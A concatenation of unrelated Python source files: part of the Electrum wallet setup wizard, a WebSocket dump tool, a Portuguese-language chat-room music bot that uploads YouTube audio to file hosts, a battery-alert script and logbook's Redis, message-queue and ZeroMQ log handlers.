self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
wsdump.py | #!/Users/alexzisis/Code/Python/apartment-finder/apartment-finder/bin/python3
import argparse
import code
import sys
import threading
import time
import ssl
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
OPCODE_DATA = (websocket.ABNF.OPCODE_TEXT, websocket.ABNF.OPCODE_BINARY)
ENCODING = get_encoding()
class VAction(argparse.Action):
def __call__(self, parser, args, values, option_string=None):
if values is None:
values = "1"
try:
values = int(values)
except ValueError:
values = values.count("v") + 1
setattr(args, self.dest, values)
def parse_args():
parser = argparse.ArgumentParser(description="WebSocket Simple Dump Tool")
parser.add_argument("url", metavar="ws_url",
help="websocket url. ex. ws://echo.websocket.org/")
parser.add_argument("-p", "--proxy",
help="proxy url. ex. http://127.0.0.1:8080")
parser.add_argument("-v", "--verbose", default=0, nargs='?', action=VAction,
dest="verbose",
help="set verbose mode. If set to 1, show opcode. "
"If set to 2, enable to trace websocket module")
parser.add_argument("-n", "--nocert", action='store_true',
help="Ignore invalid SSL cert")
parser.add_argument("-r", "--raw", action="store_true",
help="raw output")
parser.add_argument("-s", "--subprotocols", nargs='*',
help="Set subprotocols")
parser.add_argument("-o", "--origin",
help="Set origin")
parser.add_argument("--eof-wait", default=0, type=int,
help="wait time(second) after 'EOF' received.")
parser.add_argument("-t", "--text",
help="Send initial text")
parser.add_argument("--timings", action="store_true",
help="Print timings in seconds")
parser.add_argument("--headers",
help="Set custom headers. Use ',' as separator")
return parser.parse_args()
class RawInput:
def raw_input(self, prompt):
if six.PY3:
line = input(prompt)
else:
line = raw_input(prompt)
if ENCODING and ENCODING != "utf-8" and not isinstance(line, six.text_type):
line = line.decode(ENCODING).encode("utf-8")
elif isinstance(line, six.text_type):
line = line.encode("utf-8")
return line
class InteractiveConsole(RawInput, code.InteractiveConsole):
def write(self, data):
sys.stdout.write("\033[2K\033[E")
# sys.stdout.write("\n")
sys.stdout.write("\033[34m< " + data + "\033[39m")
sys.stdout.write("\n> ")
sys.stdout.flush()
def read(self):
return self.raw_input("> ")
class NonInteractive(RawInput):
def write(self, data):
sys.stdout.write(data)
sys.stdout.write("\n")
sys.stdout.flush()
def read(self):
return self.raw_input("")
def main():
start_time = time.time()
args = parse_args()
if args.verbose > 1:
websocket.enableTrace(True)
options = {}
if args.proxy:
p = urlparse(args.proxy)
options["http_proxy_host"] = p.hostname
options["http_proxy_port"] = p.port
if args.origin:
options["origin"] = args.origin
if args.subprotocols:
options["subprotocols"] = args.subprotocols
opts = {}
if args.nocert:
opts = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
if args.headers:
options['header'] = map(str.strip, args.headers.split(','))
ws = websocket.create_connection(args.url, sslopt=opts, **options)
if args.raw:
console = NonInteractive()
else:
console = InteractiveConsole()
print("Press Ctrl+C to quit")
def recv():
try:
frame = ws.recv_frame()
except websocket.WebSocketException:
return websocket.ABNF.OPCODE_CLOSE, None
if not frame:
raise websocket.WebSocketException("Not a valid frame %s" % frame)
elif frame.opcode in OPCODE_DATA:
return frame.opcode, frame.data
elif frame.opcode == websocket.ABNF.OPCODE_CLOSE:
ws.send_close()
return frame.opcode, None
elif frame.opcode == websocket.ABNF.OPCODE_PING:
ws.pong(frame.data)
return frame.opcode, frame.data
return frame.opcode, frame.data
def recv_ws():
while True:
opcode, data = recv()
msg = None
if six.PY3 and opcode == websocket.ABNF.OPCODE_TEXT and isinstance(data, bytes):
data = str(data, "utf-8")
if not args.verbose and opcode in OPCODE_DATA:
msg = data
elif args.verbose:
msg = "%s: %s" % (websocket.ABNF.OPCODE_MAP.get(opcode), data)
if msg is not None:
if args.timings:
console.write(str(time.time() - start_time) + ": " + msg)
else:
console.write(msg)
if opcode == websocket.ABNF.OPCODE_CLOSE:
break
thread = threading.Thread(target=recv_ws)
thread.daemon = True
thread.start()
if args.text:
ws.send(args.text)
while True:
try:
message = console.read()
ws.send(message)
except KeyboardInterrupt:
return
except EOFError:
time.sleep(args.eof_wait)
return
if __name__ == "__main__":
try:
main()
except Exception as e:
print(e)
|
music.py | import requests
import time
import json
import re
import os
from random import randint
import threading
import youtube_dl
import sys
import toml
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor
class Uploader:
def __init(self, filename, file_host_url):
self.filename = filename
self.file_host_url = file_host_url
def _multipart_post(self, data):
encoder = MultipartEncoder(fields=data)
monitor = MultipartEncoderMonitor(encoder)
r = requests.post(self.file_host_url,
data=monitor,
headers={'Content-Type': monitor.content_type})
return r
class FileioUploader(Uploader):
def __init__(self, filename):
self.filename = filename
self.file_host_url = "https://file.io"
def execute(self):
file = open('./cache/music/{}'.format(self.filename), 'rb')
try:
data = {'file': (file.name, file, self._mimetype())}
response = self._multipart_post(data)
finally:
file.close()
return response.json()['link']
class CatboxUploader(Uploader):
def __init__(self, filename):
self.filename = filename
self.file_host_url = "https://litterbox.catbox.moe/resources/internals/api.php"
def execute(self):
file = open('./cache/music/{}'.format(self.filename), 'rb')
try:
#rash: f30cb59306e2d72a0e958cbec
data = {
'reqtype': 'fileupload',
'time': '72h',
'fileToUpload': (file.name, file)
}
response = self._multipart_post(data)
finally:
file.close()
return response.text
class musicSistem(object):
def __init__(self):
self.config = toml.load('config.toml')
self.session = requests.session()
self.spam = {"next": False, "skip": False, "pause": False,"music": False,"post_music": False}
self.music_info = []
self.host = 'https://drrr.com/room/?ajax=1'
self.paylist_cont = 0
self.paylist_duration = []
self.paylist = []
self.paylist_title = []
self.listUrl = []
self.countMusic = 0
self.pause = True
self.nextCont = 0
self.playStatus = False
self.blockMusic = True
self.name = 'music_1.mp3'
self.durationMusic = 600
self.load_cookie()
def load_cookie(self):
f = open(self.config['Botconfig']['cookie'], 'r')
self.session.cookies.update(eval(f.read()))
f.close()
def blockMusicCommand(self):
self.blockMusic = False
def AnableMusicCommand(self):
self.blockMusic = True
def avoid_spam(self, com):
time.sleep(5)
self.spam[com] = False
def default(self):
self.durationMusic = 600
def livre(self):
self.durationMusic = 10800
def post(self, message, url='', to=''):
post_body = {
'message': message,
'url': url,
'to': to
}
p = self.session.post(
url=self.host, data=post_body)
p.close()
def share_music(self, url, name=''):
share_music_body = {
'music': 'music',
'name': name,
'url': url
}
p = self.session.post(
url=self.host, data=share_music_body)
p.close()
def thPlay(self):
t_start = threading.Thread(target=self.play)
t_start.start()
def play(self):
if self.playStatus == False:
self.playStatus = True
self.pause = False
while True:
try:
if self.pause == False:
self.share_music(
url=self.paylist[self.paylist_cont], name=self.paylist_title[self.paylist_cont])
self.paylist_cont += 1
loop = self.paylist_cont - 1
for i in range(0, self.paylist_duration[loop]):
if self.pause == True:
return
time.sleep(1)
else:
return
except Exception as e:
self.post(message="/me Playlist Vazia")
self.playStatus = False
return
else:
self.post(message="/me:Musica em andamento")
def pause_playlist(self):
commandName = 'pause'
if self.spam[commandName] == False:
self.spam[commandName] = True
self.pause = True
self.playStatus = False
self.post(message="/me Playlist Pausada")
time.sleep(10)
self.avoid_spam(commandName)
def skip_playlist(self):
commandName = 'skip'
if self.spam[commandName] == False:
self.spam[commandName] = True
self.pause = True
self.playStatus = False
self.post(message="/me Musica Pulada")
#tempo para não bugar o tempo de cada musica
time.sleep(2)
t_skip = threading.Thread(target=self.play)
t_skip.start()
self.avoid_spam(commandName)
def next(self):
commandName = 'next'
if self.spam[commandName] == False:
self.spam[commandName] = True
self.playStatus = False
try:
self.post(
message="/me Proxima Musica: {} ".format(self.paylist_title[self.paylist_cont]))
except Exception:
self.post(message="/me Playlist Vazia")
time.sleep(10)
self.avoid_spam(commandName)
def rebotPlaylist(self):
self.post(
message="/me Restart Playlist Total de Musicas: {}".format(len(self.paylist)))
self.paylist_cont = 0
self.pause = True
self.playStatus = False
time.sleep(1)
t_skip = threading.Thread(target=self.play)
t_skip.start()
def skipPlaylist(self):
self.post(message="/me Playlist Skip: {} music".format(len(self.paylist)))
self.paylist_cont = len(self.paylist)
self.pause = True
self.playStatus = False
time.sleep(1)
t_skip = threading.Thread(target=self.play)
t_skip.start()
def replayPlaylist(self):
self.post(message="/me ▷Replay▷")
self.paylist_cont = len(self.paylist) - 2
self.pause = True
self.playStatus = False
time.sleep(1)
t_skip = threading.Thread(target=self.play)
t_skip.start()
def downloadMusic(self):
while True:
if self.spam["music"] == False:
try:
url = self.listUrl[self.countMusic]
#print(url)
#self.post(message=f"▷Carregando Sua Musica.▷", to=user)
t_start = threading.Thread(target=self.playlist, args=(url,))
t_start.start()
self.countMusic += 1
except Exception:
pass
def musicList(self, message, name_sender, id_sender):
link = message[4:].replace(" ", "")
self.listUrl.append(link)
self.post(message=f"/me @{name_sender} ▷Carregando...▷")
def playlist(self, message):
commandName = 'music'
uploader_classes = {
"catbox": CatboxUploader,
"fileio": FileioUploader}
if self.spam[commandName] == False:
if self.blockMusic == True:
def upload(self, host, name):
uploader_class = uploader_classes[host]
uploader_instance = uploader_class(name)
#print(name)
result = uploader_instance.execute()
self.paylist.append(result)
self.paylist_duration.append(self.music_info['duration'])
self.paylist_title.append(self.music_info['title'])
os.remove("./cache/music/music_1.mp3")
def sand_music(self, message):
try:
link = "https://www.youtube.com/watch?v={}".format(
message)
ydl_consult = {
'quiet': True,
'skip_download': True,
}
with youtube_dl.YoutubeDL(ydl_consult) as ydl:
info = ydl.extract_info(link)
if info['duration'] > self.durationMusic:
self.post(
message="/me Musica cancelada devido a sua duração.!")
self.avoid_spam(commandName)
return
except Exception:
self.post(message="/me [Error 404 Not Found]")
self.avoid_spam(commandName)
return
try:
#print(message)
title = 'music_1'
extp = '.webm'
ydl_opts = {
'format': 'bestaudio/best',
'outtmpl': './cache/music/{}{}'.format(title, extp),
'postprocessors': [{
'key': 'FFmpegExtractAudio',
'preferredcodec': 'mp3',
'preferredquality': '192',
}],
}
#self.post(message="/me ▷Carregando musica▷")
with youtube_dl.YoutubeDL(ydl_opts) as ydl:
# link = "https://www.youtube.com/watch?v={}".format(message)
filenames = ([link])
ydl.download(filenames)
self.music_info = info
upload(self,host = 'catbox', name = '{}'.format(self.name))
self.avoid_spam(commandName)
self.post(message=f"/me [add] {self.music_info['title']}")
except Exception:
self.post(message="/me Erro Link Invalido")
self.avoid_spam(commandName)
self.spam[commandName] = True
sand_music(self, message=message)
else:
self.spam[commandName] = True
self.post(message='/me Comando Bloqueado')
self.avoid_spam(commandName)
def music_help(self, message, name_sender):
commandName = 'post_music'
if self.spam[commandName] == False:
ajuda_musica = "https://i.imgur.com/hmmERQi.png"
self.post(message="Como usar musica.",
url='{}'.format(ajuda_musica)) # deixa a sala
self.spam[commandName] = True
time.sleep(30)
self.avoid_spam(commandName)
|
Battery_notification.py | # use terminal to install
"""pip install psutil
pip install pyttsx3
pip install win10toast"""
import psutil
import time
import pyttsx3
from win10toast import ToastNotifier # also need to install win32api
import threading
toaster = ToastNotifier()
x=pyttsx3.init()
x.setProperty('rate',110)
x.setProperty('volume',3)
count = 0
def show_notification(show_text):
toaster.show_toast(show_text,
icon_path='battery_indicator.ico',
duration=10)
# loop the toaster over some period of time
while toaster.notification_active():
time.sleep(0.005)
def monitor():
while (True):
time.sleep(1)
battery = psutil.sensors_battery()
plugged = battery.power_plugged
percent = int(battery.percent)
if percent < 35:
if plugged == False:
processThread = threading.Thread(target=show_notification, args=("Your Battery at "+str(percent)+"% Please plug the cable",)) # <- note extra ','
processThread.start()
x.say("Your battery is getting low so charge it right now")
x.runAndWait()
elif percent >= 98:
if plugged == True:
processThread = threading.Thread(target=show_notification, args=("Charging is getting complete",)) # <- note extra ','
processThread.start()
x.say("Charging is getting complete")
x.runAndWait()
if __name__ == "__main__":
monitor()
|
queues.py | # -*- coding: utf-8 -*-
"""
logbook.queues
~~~~~~~~~~~~~~
This module implements queue backends.
:copyright: (c) 2010 by Armin Ronacher, Georg Brandl.
:license: BSD, see LICENSE for more details.
"""
import json
import threading
from threading import Thread, Lock
import platform
from logbook.base import NOTSET, LogRecord, dispatch_record
from logbook.handlers import Handler, WrapperHandler
from logbook.helpers import PY2, u
if PY2:
from Queue import Empty, Full, Queue as ThreadQueue
else:
from queue import Empty, Full, Queue as ThreadQueue
class RedisHandler(Handler):
"""A handler that sends log messages to a Redis instance.
It publishes each record as json dump. Requires redis module.
To receive such records you need to have a running instance of Redis.
Example setup::
handler = RedisHandler('http://127.0.0.1', port='9200', key='redis')
If your Redis instance is password protected, you can securely connect
passing your password when creating a RedisHandler object.
Example::
handler = RedisHandler(password='your_redis_password')
More info about the default buffer size: wp.me/p3tYJu-3b
"""
def __init__(self, host='127.0.0.1', port=6379, key='redis',
extra_fields=None, flush_threshold=128, flush_time=1,
level=NOTSET, filter=None, password=False, bubble=True,
context=None, push_method='rpush'):
Handler.__init__(self, level, filter, bubble)
try:
import redis
from redis import ResponseError
except ImportError:
raise RuntimeError('The redis library is required for '
'the RedisHandler')
self.redis = redis.Redis(host=host, port=port, password=password,
decode_responses=True)
try:
self.redis.ping()
except ResponseError:
raise ResponseError(
'The password provided is apparently incorrect')
self.key = key
self.extra_fields = extra_fields or {}
self.flush_threshold = flush_threshold
self.queue = []
self.lock = Lock()
self.push_method = push_method
# Set up a thread that flushes the queue every specified seconds
self._stop_event = threading.Event()
self._flushing_t = threading.Thread(target=self._flush_task,
args=(flush_time,
self._stop_event))
self._flushing_t.daemon = True
self._flushing_t.start()
def _flush_task(self, time, stop_event):
"""Calls the method _flush_buffer every certain time.
"""
while not self._stop_event.isSet():
with self.lock:
self._flush_buffer()
self._stop_event.wait(time)
def _flush_buffer(self):
"""Flushes the messaging queue into Redis.
All values are pushed at once for the same key.
The method rpush/lpush is defined by push_method argument
"""
if self.queue:
getattr(self.redis, self.push_method)(self.key, *self.queue)
self.queue = []
def disable_buffering(self):
"""Disables buffering.
If called, every single message will be directly pushed to Redis.
"""
self._stop_event.set()
self.flush_threshold = 1
def emit(self, record):
"""Emits a pair (key, value) to redis.
The key is the one provided when creating the handler, or redis if none
was provided. The value contains both the message and the hostname.
Extra values are also appended to the message.
"""
with self.lock:
r = {"message": record.msg,
"host": platform.node(),
"level": record.level_name,
"time": record.time.isoformat()}
r.update(self.extra_fields)
r.update(record.kwargs)
self.queue.append(json.dumps(r))
if len(self.queue) == self.flush_threshold:
self._flush_buffer()
def close(self):
self._flush_buffer()
class MessageQueueHandler(Handler):
"""A handler that acts as a message queue publisher, which publishes each
record as json dump. Requires the kombu module.
The queue will be filled with JSON exported log records. To receive such
log records from a queue you can use the :class:`MessageQueueSubscriber`.
For an AMQP backend such as RabbitMQ::
handler = MessageQueueHandler('amqp://guest:guest@localhost//')
This requires the py-amqp or the librabbitmq client library.
For Redis (requires redis client library)::
handler = MessageQueueHandler('redis://localhost:8889/0')
For MongoDB (requires pymongo)::
handler = MessageQueueHandler('mongodb://localhost:27017/logging')
Several other backends are also supported.
Refer to the `kombu`_ documentation
.. _kombu: http://kombu.readthedocs.org/en/latest/introduction.html
"""
def __init__(self, uri=None, queue='logging', level=NOTSET,
filter=None, bubble=False):
Handler.__init__(self, level, filter, bubble)
try:
import kombu
except ImportError:
raise RuntimeError('The kombu library is required for '
'the RabbitMQSubscriber.')
if uri:
connection = kombu.Connection(uri)
self.queue = connection.SimpleQueue(queue)
def export_record(self, record):
"""Exports the record into a dictionary ready for JSON dumping.
"""
return record.to_dict(json_safe=True)
def emit(self, record):
self.queue.put(self.export_record(record))
def close(self):
self.queue.close()
RabbitMQHandler = MessageQueueHandler
class ZeroMQHandler(Handler):
"""A handler that acts as a ZeroMQ publisher, which publishes each record
as json dump. Requires the pyzmq library.
The queue will be filled with JSON exported log records. To receive such
log records from a queue you can use the :class:`ZeroMQSubscriber`.
If `multi` is set to `True`, the handler will use a `PUSH` socket to
publish the records. This allows multiple handlers to use the same `uri`.
The records can be received by using the :class:`ZeroMQSubscriber` with
`multi` set to `True`.
Example setup::
handler = ZeroMQHandler('tcp://127.0.0.1:5000')
"""
def __init__(self, uri=None, level=NOTSET, filter=None, bubble=False,
context=None, multi=False):
Handler.__init__(self, level, filter, bubble)
try:
import zmq
except ImportError:
raise RuntimeError('The pyzmq library is required for '
'the ZeroMQHandler.')
#: the zero mq context
self.context = context or zmq.Context()
if multi:
#: the zero mq socket.
self.socket = self.context.socket(zmq.PUSH)
if uri is not None:
self.socket.connect(uri)
else:
#: the zero mq socket.
self.socket = self.context.socket(zmq.PUB)
if uri is not None:
self.socket.bind(uri)
def export_record(self, record):
"""Exports the record into a dictionary ready for JSON dumping."""
return record.to_dict(json_safe=True)
def emit(self, record):
self.socket.send(json.dumps(
self.export_record(record)).encode("utf-8"))
def close(self, linger=-1):
self.socket.close(linger)
def __del__(self):
# When the Handler is deleted we must close our socket in a
# non-blocking fashion (using linger).
# Otherwise it can block indefinitely, for example if the Subscriber is
# not reachable.
# If messages are pending on the socket, we wait 100ms for them to be
# sent then we discard them.
self.close(linger=100)
class ThreadController(object):
"""A helper class used by queue subscribers to control the background
thread. This is usually created and started in one go by
:meth:`~logbook.queues.ZeroMQSubscriber.dispatch_in_background` or
a comparable function.
"""
def __init__(self, subscriber, setup=None):
self.setup = setup
self.subscriber = subscriber
self.running = False
self._thread = None
def start(self):
"""Starts the task thread."""
self.running = True
self._thread = Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
def stop(self):
"""Stops the task thread."""
if self.running:
self.running = False
self._thread.join()
self._thread = None
def _target(self):
if self.setup is not None:
self.setup.push_thread()
try:
while self.running:
self.subscriber.dispatch_once(timeout=0.05)
finally:
if self.setup is not None:
self.setup.pop_thread()
class SubscriberBase(object):
"""Baseclass for all subscribers."""
def recv(self, timeout=None):
"""Receives a single record from the socket. Timeout of 0 means
nonblocking, `None` means blocking and otherwise it's a timeout in
seconds after which the function just returns with `None`.
Subclasses have to override this.
"""
raise NotImplementedError()
def dispatch_once(self, timeout=None):
"""Receives one record from the socket, loads it and dispatches it. Returns
`True` if something was dispatched or `False` if it timed out.
"""
rv = self.recv(timeout)
if rv is not None:
dispatch_record(rv)
return True
return False
def dispatch_forever(self):
"""Starts a loop that dispatches log records forever."""
while 1:
self.dispatch_once()
def dispatch_in_background(self, setup=None):
"""Starts a new daemonized thread that dispatches in the background.
An optional handler setup can be provided that pushed to the new
thread (can be any :class:`logbook.base.StackedObject`).
Returns a :class:`ThreadController` object for shutting down
the background thread. The background thread will already be
running when this function returns.
"""
controller = ThreadController(self, setup)
controller.start()
return controller
class MessageQueueSubscriber(SubscriberBase):
"""A helper that acts as a message queue subscriber and will dispatch
received log records to the active handler setup. There are multiple ways
to use this class.
It can be used to receive log records from a queue::
subscriber = MessageQueueSubscriber('mongodb://localhost:27017/logging')
record = subscriber.recv()
But it can also be used to receive and dispatch these in one go::
with target_handler:
subscriber = MessageQueueSubscriber('mongodb://localhost:27017/logging')
subscriber.dispatch_forever()
This will take all the log records from that queue and dispatch them
over to `target_handler`. If you want you can also do that in the
background::
subscriber = MessageQueueSubscriber('mongodb://localhost:27017/logging')
controller = subscriber.dispatch_in_background(target_handler)
The controller returned can be used to shut down the background
thread::
controller.stop()
"""
def __init__(self, uri=None, queue='logging'):
try:
import kombu
except ImportError:
raise RuntimeError('The kombu library is required.')
if uri:
connection = kombu.Connection(uri)
self.queue = connection.SimpleQueue(queue)
def __del__(self):
try:
self.close()
except AttributeError:
# subscriber partially created
pass
def close(self):
self.queue.close()
def recv(self, timeout=None):
"""Receives a single record from the socket. Timeout of 0 means
nonblocking, `None` means blocking and otherwise it's a timeout in
seconds after which the function just returns with `None`.
"""
if timeout == 0:
try:
rv = self.queue.get(block=False)
except Exception:
return
else:
rv = self.queue.get(timeout=timeout)
log_record = rv.payload
rv.ack()
return LogRecord.from_dict(log_record)
RabbitMQSubscriber = MessageQueueSubscriber
class ZeroMQSubscriber(SubscriberBase):
"""A helper that acts as ZeroMQ subscriber and will dispatch received
log records to the active handler setup. There are multiple ways to
use this class.
It can be used to receive log records from a queue::
subscriber = ZeroMQSubscriber('tcp://127.0.0.1:5000')
record = subscriber.recv()
But it can also be used to receive and dispatch these in one go::
with target_handler:
subscriber = ZeroMQSubscriber('tcp://127.0.0.1:5000')
subscriber.dispatch_forever()
This will take all the log records from that queue and dispatch them
over to `target_handler`. If you want you can also do that in the
background::
subscriber = ZeroMQSubscriber('tcp://127.0.0.1:5000')
controller = subscriber.dispatch_in_background(target_handler)
The controller returned can be used to shut down the background
thread::
controller.stop()
If `multi` is set to `True`, the subscriber will use a `PULL` socket
and listen to records published by a `PUSH` socket (usually via a
:class:`ZeroMQHandler` with `multi` set to `True`). This allows a
single subscriber to dispatch multiple handlers.
"""
def __init__(self, uri=None, context=None, multi=False):
try:
import zmq
except ImportError:
raise RuntimeError('The pyzmq library is required for '
'the ZeroMQSubscriber.')
self._zmq = zmq
#: the zero mq context
self.context = context or zmq.Context()
if multi:
#: the zero mq socket.
self.socket = self.context.socket(zmq.PULL)
if uri is not None:
self.socket.bind(uri)
else:
#: the zero mq socket.
self.socket = self.context.socket(zmq.SUB)
if uri is not None:
self.socket.connect(uri)
self.socket.setsockopt_unicode(zmq.SUBSCRIBE, u(''))
def __del__(self):
try:
self.close()
except AttributeError:
# subscriber partially created
pass
def close(self):
"""Closes the zero mq socket."""
self.socket.close()
def recv(self, timeout=None):
"""Receives a single record from the socket. Timeout of 0 means
nonblocking, `None` means blocking and otherwise it's a timeout in
seconds after which the function just returns with `None`.
"""
if timeout is None:
rv = self.socket.recv()
elif not timeout:
rv = self.socket.recv(self._zmq.NOBLOCK)
if rv is None:
return
else:
if not self._zmq.select([self.socket], [], [], timeout)[0]:
return
rv = self.socket.recv(self._zmq.NOBLOCK)
if not PY2:
rv = rv.decode("utf-8")
return LogRecord.from_dict(json.loads(rv))
def _fix_261_mplog():
"""necessary for older python's to disable a broken monkeypatch
in the logging module. See multiprocessing/util.py for the
hasattr() check. At least in Python 2.6.1 the multiprocessing
module is not imported by logging and as such the test in
